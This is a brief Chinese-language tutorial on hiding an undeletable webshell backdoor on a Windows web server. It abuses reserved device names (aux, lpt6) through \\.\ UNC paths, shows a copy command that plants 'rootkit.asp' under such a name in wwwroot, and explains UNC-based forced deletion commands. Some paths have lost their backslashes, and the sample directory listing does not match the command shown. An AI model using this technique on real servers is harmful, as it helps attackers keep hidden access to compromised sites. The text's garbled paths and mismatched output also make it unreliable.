主要是利用系統保留檔名建立無法刪除的webshell來隱藏後門。
Windows 下不能夠以下面這些字樣來命名檔案或資料夾：
 
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9  
但是通過cmd的copy命令即可實現：
 
copy rootkit.asp \\.\D:\wwwroot\aux.test.asp 前面必須有\\.\,並且aux等關鍵字必須在前面
 
已複製1 個檔案。
 
D:\wwwroot>dir
2011-04-25 14:41 <DIR> .
2011-04-25 14:41 <DIR> ..
2011-03-08 22:50 42,756 aux.asp
2009-05-02 03:02 9,083 index.asp
2012-03-08 22:50 42,756 rootkit.asp
 
這類檔案無法在圖形介面刪除，只能在命令列下刪除：
 
del \\.\D:\wwwroot\lpt6.chouwazi.com.asp ​

檢視這類檔案

type  \\.\D:\wwwroot\lpt6.chouwazi.com.asp ​

. 的用法:

rd /s /q \.h:autorun.inf這條命令為什麼能刪除包含畸形資料夾在內的所有資料夾？

\.理解為\127.0.0.1

UNC的一個本地化特例。

?可以理解成遍歷，?是萬用字元，表示匹配0個或1個任意字元。

.代表本地節點，在概念上來有點像磁碟根目錄，也可以說成是計算機根目錄 所以dir \.C:是可以被命令列直譯器識別的，更可以跨碟符的來使用絕對路徑引用，例如: F:>\.C:windowssystem32cmd.exe 使用UNC路徑不會撿測路徑中的保留字裝置名稱等，因此刪除包含畸形資料夾在內的所有資料夾

del /q /f /a \?%1可以刪除所有檔案 UNC路徑的一個特例。UNC路徑就是符合 \servernamesharename格式，其中 servername是伺服器名，sharename是共享資源的名稱。?是統配符，表示匹配0個或1個任意字元。使用UNC路徑不會撿測路徑中的保留字裝置名稱等，因此可以用這種方法來刪除特殊檔案或目錄。

注： 如果你想刪除的資料夾中包含特殊路徑，可能導致整個磁碟分割槽的資料全部被刪除。因此，如果你還不能對這個命令瞭如指掌，不建議使用這樣的命令。